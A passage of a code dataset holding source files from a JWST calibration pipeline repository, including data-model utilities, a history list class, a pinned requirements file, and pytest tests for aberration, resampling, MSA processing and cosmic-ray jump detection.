'asn_id' in asn_data and 'asn_pool' in asn_data:\n return True\n return False\n\n\ndef gentle_asarray(a, dtype):\n \"\"\"\n Performs an asarray that doesn't cause a copy if the byteorder is\n different. It also ignores column name differences -- the\n resulting array will have the column names from the given dtype.\n \"\"\"\n out_dtype = np.dtype(dtype)\n if isinstance(a, np.ndarray):\n in_dtype = a.dtype\n # Non-table array\n if in_dtype.fields is None and out_dtype.fields is None:\n if np.can_cast(in_dtype, out_dtype, 'equiv'):\n return a\n else:\n return np.asanyarray(a, dtype=out_dtype)\n elif in_dtype.fields is not None and out_dtype.fields is not None:\n # When a FITS file includes a pseudo-unsigned-int column, astropy will return\n # a FITS_rec with an incorrect table dtype. The following code rebuilds\n # in_dtype from the individual fields, which are correctly labeled with an\n # unsigned int dtype.\n # We can remove this once the issue is resolved in astropy:\n # https://github.com/astropy/astropy/issues/8862\n if isinstance(a, fits.fitsrec.FITS_rec):\n new_in_dtype = []\n updated = False\n for field_name in in_dtype.fields:\n table_dtype = in_dtype[field_name]\n field_dtype = a.field(field_name).dtype\n if np.issubdtype(table_dtype, np.signedinteger) and np.issubdtype(field_dtype, np.unsignedinteger):\n new_in_dtype.append((field_name, field_dtype))\n updated = True\n else:\n new_in_dtype.append((field_name, table_dtype))\n if updated:\n in_dtype = np.dtype(new_in_dtype)\n\n if in_dtype == out_dtype:\n return a\n in_names = {n.lower() for n in in_dtype.names}\n out_names = {n.lower() for n in out_dtype.names}\n if in_names == out_names:\n # Change the dtype name to match the fits record names\n # as the mismatch causes case insensitive access to fail\n out_dtype.names = in_dtype.names\n else:\n raise ValueError(\n \"Column names don't match schema. \"\n \"Schema has {0}. Data has {1}\".format(\n str(out_names.difference(in_names)),\n str(in_names.difference(out_names))))\n\n new_dtype = []\n for i in range(len(out_dtype.fields)):\n in_type = in_dtype[i]\n out_type = out_dtype[i]\n if in_type.subdtype is None:\n type_str = in_type.str\n else:\n type_str = in_type.subdtype[0].str\n if np.can_cast(in_type, out_type, 'equiv'):\n new_dtype.append(\n (out_dtype.names[i],\n type_str,\n in_type.shape))\n else:\n return np.asanyarray(a, dtype=out_dtype)\n return a.view(dtype=np.dtype(new_dtype))\n else:\n return np.asanyarray(a, dtype=out_dtype)\n else:\n try:\n a = np.asarray(a, dtype=out_dtype)\n except Exception:\n raise ValueError(\"Can't convert {0!s} to ndarray\".format(type(a)))\n return a\n\ndef get_short_doc(schema):\n title = schema.get('title', None)\n description = schema.get('description', None)\n if description is None:\n description = title or ''\n else:\n if title is not None:\n description = title + '\\n\\n' + description\n return description.partition('\\n')[0]\n\n\ndef ensure_ascii(s):\n if isinstance(s, bytes):\n s = s.decode('ascii')\n return s\n\n\ndef create_history_entry(description, software=None):\n \"\"\"\n Create a HistoryEntry object.\n\n Parameters\n ----------\n description : str\n Description of the change.\n software : dict or list of dict\n A description of the software used. It should not include\n asdf itself, as that is automatically notated in the\n `asdf_library` entry.\n\n Each dict must have the following keys:\n\n ``name``: The name of the software\n ``author``: The author or institution that produced the software\n ``homepage``: A URI to the homepage of the software\n ``version``: The version of the software\n\n Examples\n --------\n >>> soft = {'name': 'jwreftools', 'author': 'STSCI', \\\n 'homepage': 'https://github.com/spacetelescope/jwreftools', 'version': \"0.7\"}\n >>> entry = create_history_entry(description=\"HISTORY of this file\", software=soft)\n\n \"\"\"\n from asdf.tags.core import Software, HistoryEntry\n import datetime\n\n if isinstance(software, list):\n software = [Software(x) for x in software]\n elif software is not None:\n software = Software(software)\n\n entry = HistoryEntry({\n 'description': description,\n 'time': datetime.datetime.utcnow()\n })\n\n if software is not None:\n entry['software'] = software\n return entry\n\n\ndef get_envar_as_boolean(name, default=False):\n \"\"\"Interpret an environmental as a boolean flag\n\n Truth is any numeric value that is not 0 or\n any of the following case-insensitive strings:\n\n ('true', 't', 'yes', 'y')\n\n Parameters\n ----------\n name : str\n The name of the environmental variable to retrieve\n\n default : bool\n If the environmental variable cannot be accessed, use as the default.\n \"\"\"\n truths = ('true', 't', 'yes', 'y')\n falses = ('false', 'f', 'no', 'n')\n if name in os.environ:\n value = os.environ[name]\n try:\n value = bool(int(value))\n except ValueError:\n value_lowcase = value.lower()\n if value_lowcase not in truths + falses:\n raise ValueError(f'Cannot convert value \"{value}\" to boolean unambiguously.')\n return value_lowcase in truths\n return value\n\n log.debug(f'Environmental \"{name}\" cannot be found. Using default value of \"{default}\".')\n return default\n" }, { "alpha_fraction": 0.6012104749679565, "alphanum_fraction": 0.6650975346565247, "avg_line_length": 24.20339012145996, "blob_id": "39d04d2c8f07b45c82fe94736db485ac4a05ae59", "content_id": "0b02c608d5d2d4f84f2f9d4ef61acdaaba909931", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1487, "license_type": "permissive", "max_line_length": 61, "num_lines": 59, "path": "/jwst/tests/test_velocity_aberration.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nTest script for set_velocity_aberration.py\n\"\"\"\nfrom numpy import isclose\nimport os\nimport sys\n\nsys.path.insert(\n 0,\n os.path.join(os.path.dirname(__file__), '../../scripts')\n)\n\nimport set_velocity_aberration as sva # noqa: E402\n\n# Testing constants\nGOOD_VELOCITY = (100.0, 100.0, 100.0)\nGOOD_POS = (0., 0.)\nGOOD_SCALE_FACTOR = 1.000333731048419\nGOOD_OFFSET_X = 0.00033356409519815205\nGOOD_OFFSET_Y = 0.00033356409519815205\n\nZERO_VELOCITY = 0.\nZERO_SCALE_FACTOR = 1.0\nZERO_OFFSET_X = 0.\nZERO_OFFSET_Y = 0.\n\n\ndef test_scale_factor_valid():\n scale_factor = sva.aberration_scale(\n GOOD_VELOCITY[0], GOOD_VELOCITY[1], GOOD_VELOCITY[2],\n GOOD_POS[0], GOOD_POS[1]\n )\n assert isclose(scale_factor, GOOD_SCALE_FACTOR)\n\n\ndef test_scale_factor_zero_velocity():\n scale_factor = sva.aberration_scale(\n ZERO_VELOCITY, ZERO_VELOCITY, ZERO_VELOCITY,\n GOOD_POS[0], GOOD_POS[1]\n )\n assert isclose(scale_factor, ZERO_SCALE_FACTOR)\n\n\ndef test_offset_valid():\n delta_x, delta_y = sva.aberration_offset(\n GOOD_VELOCITY[0], GOOD_VELOCITY[1], GOOD_VELOCITY[2],\n GOOD_POS[0], GOOD_POS[1]\n )\n assert isclose(delta_x, GOOD_OFFSET_X)\n assert isclose(delta_y, GOOD_OFFSET_Y)\n\n\ndef test_offset_zero_velocity():\n delta_x, delta_y = sva.aberration_offset(\n ZERO_VELOCITY, ZERO_VELOCITY, ZERO_VELOCITY,\n GOOD_POS[0], GOOD_POS[1]\n )\n assert isclose(delta_x, ZERO_OFFSET_X)\n assert isclose(delta_y, ZERO_OFFSET_Y)\n" }, { "alpha_fraction": 0.555402934551239, "alphanum_fraction": 0.555402934551239, "avg_line_length": 27.736841201782227, "blob_id": "95ef0694018a6d0c4ac8b1ec26d0485937f0f18b", "content_id": "677b54d09d0ee6cc0ab5a1b9035db1067b6d60b0", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2184, "license_type": "permissive", "max_line_length": 67, "num_lines": 76, "path": "/jwst/datamodels/history.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from asdf.tags.core import HistoryEntry\n\ndef _iterable(values):\n if isinstance(values, str) or not hasattr(values, '__iter__'):\n values = (values,)\n return values\n\nclass HistoryList:\n \"\"\"\n A list that coerces a new value into a HistoryEntry.\n Only a subset of the list interface is implemented.\n \"\"\"\n def __init__(self, asdf):\n self._context = asdf\n if len(self._context.get_history_entries()):\n self._entries = self._context.get_history_entries()\n else:\n self._context.add_history_entry(\"fake entry\")\n self._entries = self._context.get_history_entries()\n self._entries.clear()\n\n def __len__(self):\n return len(self._entries)\n\n def __getitem__(self, key):\n return self._entries[key]\n\n def __setitem__(self, key, value):\n self.append(value)\n value = self._entries.pop()\n self._entries[key] = value\n\n def __delitem__(self, key):\n del self._entries[key]\n\n def __iter__(self):\n return iter(self._entries)\n\n def __repr__(self):\n return repr(self._entries)\n\n def __str__(self):\n return str(self._entries)\n\n def __eq__(self, other):\n if isinstance(other, HistoryList):\n other = other._entries\n else:\n other = _iterable(other)\n\n if len(self) != len(other):\n return False\n\n for self_entry, other_entry in zip(self._entries, other):\n if isinstance(other_entry, str):\n if self_entry.get('description') != other_entry:\n return False\n elif isinstance(other_entry, dict):\n for key in other_entry.keys():\n if self_entry.get(key) != other_entry.get(key):\n return False\n return True\n\n def append(self, value):\n if isinstance(value, HistoryEntry):\n self._entries.append(value)\n else:\n self._context.add_history_entry(value)\n\n def clear(self):\n self._entries.clear()\n\n def extend(self, values):\n values = _iterable(values)\n for value in values:\n self.append(value)\n" }, { "alpha_fraction": 0.5118279457092285, "alphanum_fraction": 0.6827957034111023, "avg_line_length": 17.235294342041016, "blob_id": "c8de1f4b35000073ca9e5afe305cc8df57457aad", "content_id": "9e7c79b44ae886dc38c44148ef69893f59310f30", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 930, "license_type": "permissive", "max_line_length": 59, "num_lines": 51, "path": "/requirements-sdp.txt", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "# To generate this file:\n#\n# pip install -e .[test]\n# pip install pytest-xdist\n# pip freeze | grep -v jwst.git >> requirements-sdp.txt\nasdf==2.7.0\nastropy==4.0.1.post1\nattrs==19.3.0\ncertifi==2020.6.20\nchardet==3.0.4\nci-watson==0.5\ncodecov==2.1.8\ncoverage==5.2.1\ncrds==7.5.0.0\nCython==0.29.21\ndrizzle==1.13.1\nfilelock==3.0.12\ngwcs==0.13.0\nidna==2.10\nimportlib-metadata==1.7.0\njsonschema==3.2.0\nlxml==4.5.2\nmore-itertools==8.4.0\nnumpy==1.19.1\npackaging==20.4\nParsley==1.3\nphotutils==0.7.2\npluggy==0.13.1\npsutil==5.7.2\npy==1.9.0\npyparsing==2.4.7\npyrsistent==0.16.0\npytest==5.4.3\npytest-cov==2.10.0\npytest-doctestplus==0.8.0\npytest-openfiles==0.5.0\npytest-xdist==1.34.0\nPyYAML==5.3.1\nrequests==2.24.0\nrequests-mock==1.8.0\nscipy==1.5.2\nsemantic-version==2.8.5\nsix==1.15.0\nspherical-geometry==1.2.18\nstsci.image==2.3.3\nstsci.imagestats==1.6.2\nstsci.stimage==0.2.4\ntweakwcs==0.6.4\nurllib3==1.25.10\nwcwidth==0.2.5\nzipp==3.1.0\n" }, { "alpha_fraction": 0.603487491607666, "alphanum_fraction": 0.6133434176445007, "avg_line_length": 28.311111450195312, "blob_id": "d5e461487bc675c6c01229aa4affd8a84ebc7133", "content_id": "c9545c0fd7edac1e571c451eee88945d90470e01", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1319, "license_type": "permissive", "max_line_length": 73, "num_lines": 45, "path": "/jwst/datamodels/level1b.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from .model_base import DataModel\n\n__all__ = ['Level1bModel']\n\n\nclass Level1bModel(DataModel):\n \"\"\"\n A data model for raw 4D ramps level-1b products.\n\n Parameters\n __________\n data : numpy uint16 array\n The science data\n\n zeroframe : numpy uint16 array\n Zeroframe array\n\n refout : numpy uint16 array\n Reference Output\n\n group : numpy table\n group parameters table\n\n int_times : numpy table\n table of times for each integration\n\n \"\"\"\n schema_url = \"http://stsci.edu/schemas/jwst_datamodel/level1b.schema\"\n\n def __init__(self, init=None, **kwargs):\n super(Level1bModel, self).__init__(init=init, **kwargs)\n\n # zeroframe is a lower dimensional array than\n # the science data. However, its dimensions are not\n # consecutive with data, so the default model\n # creates a wrongly shaped array. If data is given\n # use the appropriate dimensions.\n #\n # TODO: Hacky. Need solution which involves schema\n # specification and embedded in DataModel.\n #if 'zeroframe' not in self.instance and \\\n # 'data' in self.instance and \\\n # len(self.data.shape) == 4:\n # nints, ngroups, ny, nx = self.data.shape\n # self.zeroframe = np.zeros((nints, ny, nx))\n" }, { "alpha_fraction": 0.47067272663116455, "alphanum_fraction": 0.5575771927833557, "avg_line_length": 27.033557891845703, "blob_id": "3fef1871a222b95993f5f0d27fe25401153ca3d4", "content_id": "be2da9866dd48b0d3092802b7817e2406d2f4666", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4177, "license_type": "permissive", "max_line_length": 96, "num_lines": 149, "path": "/jwst/resample/tests/test_resample_spec.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom numpy.testing import assert_allclose\n\nfrom ...datamodels import ImageModel\nfrom jwst.assign_wcs import AssignWcsStep\nfrom jwst.extract_2d import Extract2dStep\nfrom jwst.resample import ResampleSpecStep\n\nfrom gwcs.wcstools import grid_from_bounding_box\n\n\ndef test_spatial_transform_nirspec():\n wcsinfo = {\n 'dec_ref': -0.00601415671349804,\n 'ra_ref': -0.02073605215697509,\n 'roll_ref': -0.0,\n 'v2_ref': -453.5134,\n 'v3_ref': -373.4826,\n 'v3yangle': 0.0,\n 'vparity': -1}\n\n instrument = {\n 'detector': 'NRS1',\n 'filter': 'CLEAR',\n 'grating': 'PRISM',\n 'name': 'NIRSPEC',\n 'gwa_tilt': 37.0610,\n 'gwa_xtilt': 0.0001,\n 'gwa_ytilt': 0.0001}\n\n subarray = {\n 'fastaxis': 1,\n 'name': 'SUBS200A1',\n 'slowaxis': 2,\n 'xsize': 72,\n 'xstart': 1,\n 'ysize': 416,\n 'ystart': 529}\n\n observation = {\n 'date': '2016-09-05',\n 'time': '8:59:37'}\n\n exposure = {\n 'duration': 11.805952,\n 'end_time': 58119.85416,\n 'exposure_time': 11.776,\n 'frame_time': 0.11776,\n 'group_time': 0.11776,\n 'groupgap': 0,\n 'integration_time': 11.776,\n 'nframes': 1,\n 'ngroups': 100,\n 'nints': 1,\n 'nresets_between_ints': 0,\n 'nsamples': 1,\n 'readpatt': 'NRSRAPID',\n 'sample_time': 10.0,\n 'start_time': 58119.8333,\n 'type': 'NRS_FIXEDSLIT',\n 'zero_frame': False}\n\n im = ImageModel()\n im.data = np.random.rand(2048, 2048)\n im.error = np.random.rand(2048, 2048)\n im.dq = np.random.rand(2048, 2048)\n\n im.meta.wcsinfo._instance.update(wcsinfo)\n im.meta.instrument._instance.update(instrument)\n im.meta.observation._instance.update(observation)\n im.meta.exposure._instance.update(exposure)\n im.meta.subarray._instance.update(subarray)\n im.meta.filename = 'test.fits'\n im = AssignWcsStep.call(im)\n im = Extract2dStep.call(im)\n im = ResampleSpecStep.call(im)\n\n for slit in im.slits:\n x, y =grid_from_bounding_box(slit.meta.wcs.bounding_box)\n ra, dec, lam = slit.meta.wcs(x, y)\n\n ra1 = np.where(ra < 0, 360 + ra, ra)\n assert_allclose(slit.meta.wcs.invert(ra, dec, lam), slit.meta.wcs.invert(ra1, dec, lam))\n\n\ndef test_spatial_transform_miri():\n wcsinfo = {\n 'dec_ref': -0.00601415671349804,\n 'ra_ref': -0.02073605215697509,\n 'roll_ref': -0.0,\n 'v2_ref': -453.5134,\n 'v3_ref': -373.4826,\n 'v3yangle': 0.0,\n 'vparity': -1}\n\n instrument = {\n 'detector': 'MIRIMAGE',\n 'filter': 'P750L',\n 'name': 'MIRI'}\n\n observation = {\n 'date': '2019-01-01',\n 'time': '17:00:00'}\n\n subarray = {\n 'fastaxis': 1,\n 'name': 'SLITLESSPRISM',\n 'slowaxis': 2,\n 'xsize': 72,\n 'xstart': 1,\n 'ysize': 416,\n 'ystart': 529}\n\n exposure = {\n 'duration': 11.805952,\n 'end_time': 58119.85416,\n 'exposure_time': 11.776,\n 'frame_time': 0.11776,\n 'group_time': 0.11776,\n 'groupgap': 0,\n 'integration_time': 11.776,\n 'nframes': 1,\n 'ngroups': 100,\n 'nints': 1,\n 'nresets_between_ints': 0,\n 'nsamples': 1,\n 'readpatt': 'FAST',\n 'sample_time': 10.0,\n 'start_time': 58119.8333,\n 'type': 'MIR_LRS-SLITLESS',\n 'zero_frame': False}\n\n im = ImageModel()\n im.data = np.random.rand(416, 72)\n im.error = np.random.rand(416, 72)\n im.dq = np.random.rand(416, 72)\n\n im.meta.wcsinfo._instance.update(wcsinfo)\n im.meta.instrument._instance.update(instrument)\n im.meta.observation._instance.update(observation)\n im.meta.exposure._instance.update(exposure)\n im.meta.subarray._instance.update(subarray)\n\n out = AssignWcsStep.call(im)\n out = ResampleSpecStep.call(out)\n x, y =grid_from_bounding_box(out.meta.wcs.bounding_box)\n ra, dec, lam = out.meta.wcs(x, y)\n ra1 = np.where(ra < 0, 360 + ra, ra)\n assert_allclose(out.meta.wcs.invert(ra, dec, lam), out.meta.wcs.invert(ra1, dec, lam))\n" }, { "alpha_fraction": 0.6638655662536621, "alphanum_fraction": 0.7605041861534119, "avg_line_length": 36.578948974609375, "blob_id": "34f51c4e36932d7a4c388ebe3d6404d8273a99cd", "content_id": "2c54786d17f344dc3354be7f6ec4df937b49dfa2", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 714, "license_type": "permissive", "max_line_length": 89, "num_lines": 19, "path": "/jwst/regtest/test_nirspec_image2.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom astropy.io.fits.diff import FITSDiff\n\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\[email protected]\ndef test_nirspec_image2(_jail, rtdata, fitsdiff_default_kwargs):\n rtdata.get_data(\"nirspec/imaging/jw84600010001_02102_00001_nrs2_rate.fits\")\n\n collect_pipeline_cfgs(\"config\")\n args = [\"config/calwebb_image2.cfg\", rtdata.input]\n Step.from_cmdline(args)\n rtdata.output = \"jw84600010001_02102_00001_nrs2_cal.fits\"\n\n rtdata.get_truth(\"truth/test_nirspec_image2/jw84600010001_02102_00001_nrs2_cal.fits\")\n\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n" }, { "alpha_fraction": 0.5576266050338745, "alphanum_fraction": 0.5784404873847961, "avg_line_length": 29.951923370361328, "blob_id": "26d83b8f5ed5c455fd73595cdbc8637722bb3774", "content_id": "6ccbbdaa85f9395019d3e824cbe8a3b824f9ec72", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3219, "license_type": "permissive", "max_line_length": 105, "num_lines": 104, "path": "/jwst/tests_nightly/general/nirspec/test_calwebb_spec2_nrs_msa.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Test calwebb_spec2 for NIRSpec MSA\"\"\"\nimport os.path as op\n\nimport pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\nfrom jwst.associations import load_asn\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe.step import Step\n\n\[email protected]\nclass TestSpec2NRSMSA(BaseJWSTTest):\n \"\"\"Test various aspects of calibrating NIRSpec MSA mode\"\"\"\n input_loc = 'nirspec'\n ref_loc = ['test_datasets', 'msa', 'simulated-3nod', 'truth']\n test_dir = ['test_datasets', 'msa', 'simulated-3nod']\n\n def test_msa_missing(self, caplog):\n \"\"\"Test MSA missing failure\"\"\"\n input_file = self.get_data(\n *self.test_dir, 'level2a_twoslit', 'F170LP-G235M_MOS_observation-6-c0e0_001_DN_NRS1_mod.fits'\n )\n\n collect_pipeline_cfgs('cfgs')\n args = [\n op.join('cfgs', 'calwebb_spec2.cfg'),\n input_file\n ]\n\n with pytest.raises(Exception):\n Step.from_cmdline(args)\n\n assert 'Missing MSA meta (MSAMETFL) file' in caplog.text\n\n def test_msa_missing_nofail(self, caplog):\n \"\"\"Test MSA missing failure\"\"\"\n input_file = self.get_data(\n *self.test_dir, 'level2a_twoslit', 'F170LP-G235M_MOS_observation-6-c0e0_001_DN_NRS1_mod.fits'\n )\n\n collect_pipeline_cfgs('cfgs')\n args = [\n op.join('cfgs', 'calwebb_spec2.cfg'),\n input_file,\n '--fail_on_exception=false'\n ]\n\n Step.from_cmdline(args)\n\n assert 'Missing MSA meta (MSAMETFL) file' in caplog.text\n\n def test_msa_missing_skip(self, caplog):\n \"\"\"Test MSA missing failure\"\"\"\n input_file = self.get_data(\n *self.test_dir, 'level2a_twoslit', 'F170LP-G235M_MOS_observation-6-c0e0_001_DN_NRS1_mod.fits'\n )\n\n collect_pipeline_cfgs('cfgs')\n args = [\n op.join('cfgs', 'calwebb_spec2.cfg'),\n input_file,\n '--steps.assign_wcs.skip=true'\n ]\n\n Step.from_cmdline(args)\n\n assert 'Aborting remaining processing for this exposure.' in caplog.text\n\n def test_run_msaflagging(self, caplog):\n \"\"\"Test msa flagging operation\"\"\"\n\n # Retrieve the data.\n collect_pipeline_cfgs('cfgs')\n self.get_data(\n *self.test_dir, 'jw95065006001_0_msa_twoslit.fits'\n )\n asn_path = self.get_data(\n *self.test_dir, 'mos_udf_g235m_twoslit_spec2_asn.json'\n )\n with open(asn_path) as fp:\n asn = load_asn(fp)\n for product in asn['products']:\n for member in product['members']:\n self.get_data(\n *self.test_dir, 'level2a_twoslit', member['expname']\n )\n\n # Run step.\n args = [\n op.join('cfgs', 'calwebb_spec2.cfg'),\n asn_path,\n '--steps.msa_flagging.skip=false'\n ]\n Step.from_cmdline(args)\n\n # Test.\n assert 'Step msa_flagging running with args' in caplog.text\n assert 'Step msa_flagging done' in caplog.text\n\n for product in asn['products']:\n prod_name = product['name'] + '_cal.fits'\n assert op.isfile(prod_name)\n" }, { "alpha_fraction": 0.47309738397598267, "alphanum_fraction": 0.5792407989501953, "avg_line_length": 40.5625, "blob_id": "51de8ddbd71459ef66a0bec0add63ce38f25ba4c", "content_id": "f72e0ef5999e8be2b6abbfb954209673daa223a3", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27265, "license_type": "permissive", "max_line_length": 114, "num_lines": 656, "path": "/jwst/jump/tests/test_detect_jumps.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pytest\n\nfrom jwst.datamodels import GainModel, ReadnoiseModel\nfrom jwst.datamodels import RampModel\nfrom jwst.jump.jump import detect_jumps\nimport multiprocessing\nfrom jwst.datamodels import dqflags\n\ndef test_nocrs_noflux(setup_inputs):\n \"\"\"\"\n All pixel values are zero. So slope should be zero\n \"\"\"\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=5)\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 4, True)\n assert (0 == np.max(out_model.groupdq))\n\ndef test_nocrs_noflux_badgain_pixel(setup_inputs):\n \"\"\"\"\n all pixel values are zero. So slope should be zero, pixel with bad gain should\n have pixel dq set to 'NO_GAIN_VALUE' and 'DO_NOT_USE'\n \"\"\"\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=5)\n gain.data[7, 7] = -10 #bad gain\n gain.data[17, 17] = np.nan # bad gain\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 4, True)\n assert(np.bitwise_and(out_model.pixeldq[7, 7], dqflags.pixel['NO_GAIN_VALUE']))\n assert (np.bitwise_and(out_model.pixeldq[7, 7], dqflags.pixel['DO_NOT_USE']))\n assert (np.bitwise_and(out_model.pixeldq[17, 17], dqflags.pixel['NO_GAIN_VALUE']))\n assert (np.bitwise_and(out_model.pixeldq[17, 17], dqflags.pixel['DO_NOT_USE']))\n\n\ndef test_nocrs_noflux_subarray(setup_inputs):\n \"\"\"\"\n All pixel values are zero. This shows that the subarray reference files get extracted from the full frame\n versions.\n \"\"\"\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=5, subarray=True)\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 4, True)\n assert (0 == np.max(out_model.groupdq))\n\ndef test_onecr_10_groups_neighbors_flagged(setup_inputs):\n \"\"\"\"\n A single CR in a 10 group exposure\n \"\"\"\n grouptime = 3.0\n ingain = 200\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups,\n gain=ingain, readnoise=inreadnoise, deltatime=grouptime)\n # two segments perfect fit, second segment has twice the slope\n model1.data[0, 0, 5, 5] = 15.0\n model1.data[0, 1, 5, 5] = 20.0\n model1.data[0, 2, 5, 5] = 25.0\n model1.data[0, 3, 5, 5] = 30.0\n model1.data[0, 4, 5, 5] = 35.0\n model1.data[0, 5, 5, 5] = 140.0\n model1.data[0, 6, 5, 5] = 150.0\n model1.data[0, 7, 5, 5] = 160.0\n model1.data[0, 8, 5, 5] = 170.0\n model1.data[0, 9, 5, 5] = 180.0\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 4, True)\n assert (4 == np.max(out_model.groupdq[0, 5, 5, 5]))\n assert (4 == out_model.groupdq[0, 5, 5, 6])\n assert (4 == out_model.groupdq[0, 5, 5, 4])\n assert (4 == out_model.groupdq[0, 5, 6, 5])\n assert (4 == out_model.groupdq[0, 5, 4, 5])\n\ndef test_nocr_100_groups_nframes1(setup_inputs):\n \"\"\"\"\n NO CR in a 100 group exposure to make sure that frames_per_group is passed correctly to\n twopoint_difference. This test recreates the problem found in issue #4571.\n \"\"\"\n grouptime = 3.0\n ingain = 1 #to make the noise calculation simple\n inreadnoise = np.float64(7)\n ngroups = 100\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups, nrows=100, ncols=100,\n gain=ingain, readnoise=inreadnoise,\n deltatime=grouptime)\n model1.meta.exposure.nframes = 1\n # two segments perfect fit, second segment has twice the slope\n model1.data[0, 0, 5, 5] = 14.0\n model1.data[0, 1, 5, 5] = 20.0\n model1.data[0, 2, 5, 5] = 27.0\n model1.data[0, 3, 5, 5] = 30.0\n model1.data[0, 4, 5, 5] = 38.0\n model1.data[0, 5, 5, 5] = 40.0\n model1.data[0, 6, 5, 5] = 50.0\n model1.data[0, 7, 5, 5] = 52.0\n model1.data[0, 8, 5, 5] = 63.0\n model1.data[0, 9, 5, 5] = 68.0\n for i in range(10,100):\n model1.data[0,i,5,5] = i * 5\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 4, True)\n assert (0 == np.max(out_model.groupdq))\n\ndef test_twoints_onecr_each_10_groups_neighbors_flagged(setup_inputs):\n \"\"\"\"\n Two integrations with CRs in different locations. This makes sure we are correctly\n dealing with integrations.\n \"\"\"\n grouptime = 3.0\n ingain = 200\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups, nints=2,\n gain=ingain, readnoise=inreadnoise, deltatime=grouptime)\n # two segments perfect fit, second segment has twice the slope\n model1.data[0, 0, 5, 5] = 15.0\n model1.data[0, 1, 5, 5] = 20.0\n model1.data[0, 2, 5, 5] = 25.0\n model1.data[0, 3, 5, 5] = 30.0\n model1.data[0, 4, 5, 5] = 35.0\n model1.data[0, 5, 5, 5] = 140.0\n model1.data[0, 6, 5, 5] = 150.0\n model1.data[0, 7, 5, 5] = 160.0\n model1.data[0, 8, 5, 5] = 170.0\n model1.data[0, 9, 5, 5] = 180.0\n model1.data[1, 0, 15, 5] = 15.0\n model1.data[1, 1, 15, 5] = 20.0\n model1.data[1, 2, 15, 5] = 25.0\n model1.data[1, 3, 15, 5] = 30.0\n model1.data[1, 4, 15, 5] = 35.0\n model1.data[1, 5, 15, 5] = 40.0\n model1.data[1, 6, 15, 5] = 45.0\n model1.data[1, 7, 15, 5] = 160.0\n model1.data[1, 8, 15, 5] = 170.0\n model1.data[1, 9, 15, 5] = 180.0\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 4, True)\n assert (4 == np.max(out_model.groupdq[0, 5, 5, 5]))\n assert (4 == out_model.groupdq[0, 5, 5, 6])\n assert (4 == out_model.groupdq[0, 5, 5, 4])\n assert (4 == out_model.groupdq[0, 5, 6, 5])\n assert (4 == out_model.groupdq[0, 5, 4, 5])\n assert (4 == out_model.groupdq[1, 7, 15, 5])\n assert (4 == out_model.groupdq[1, 7, 15, 6])\n assert (4 == out_model.groupdq[1, 7, 15, 4])\n assert (4 == out_model.groupdq[1, 7, 16, 5])\n assert (4 == out_model.groupdq[1, 7, 14, 5])\n\ndef test_flagging_of_CRs_across_slice_boundaries(setup_inputs):\n \"\"\"\"\n A multiprocessing test that has two CRs on the boundary between two slices.\n This makes sure that we are correctly flagging neighbors in different slices.\n \"\"\"\n grouptime = 3.0\n ingain = 200\n inreadnoise = np.float64(7)\n ngroups = 10\n\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups, nints=2,\n gain=ingain, readnoise=inreadnoise,\n deltatime=grouptime)\n nrows = model1.data.shape[3]\n num_cores = multiprocessing.cpu_count()\n max_cores = 'half'\n numslices = num_cores // 2\n if numslices > 1:\n yincrement = int(nrows / numslices)\n # two segments perfect fit, second segment has twice the slope\n #add a CR on the last row of the first slice\n model1.data[0, 0, yincrement-1, 5] = 15.0\n model1.data[0, 1, yincrement-1, 5] = 20.0\n model1.data[0, 2, yincrement-1, 5] = 25.0\n model1.data[0, 3, yincrement-1, 5] = 30.0\n model1.data[0, 4, yincrement-1, 5] = 35.0\n model1.data[0, 5, yincrement-1, 5] = 140.0\n model1.data[0, 6, yincrement-1, 5] = 150.0\n model1.data[0, 7, yincrement-1, 5] = 160.0\n model1.data[0, 8, yincrement-1, 5] = 170.0\n model1.data[0, 9, yincrement-1, 5] = 180.0\n #add a CR on 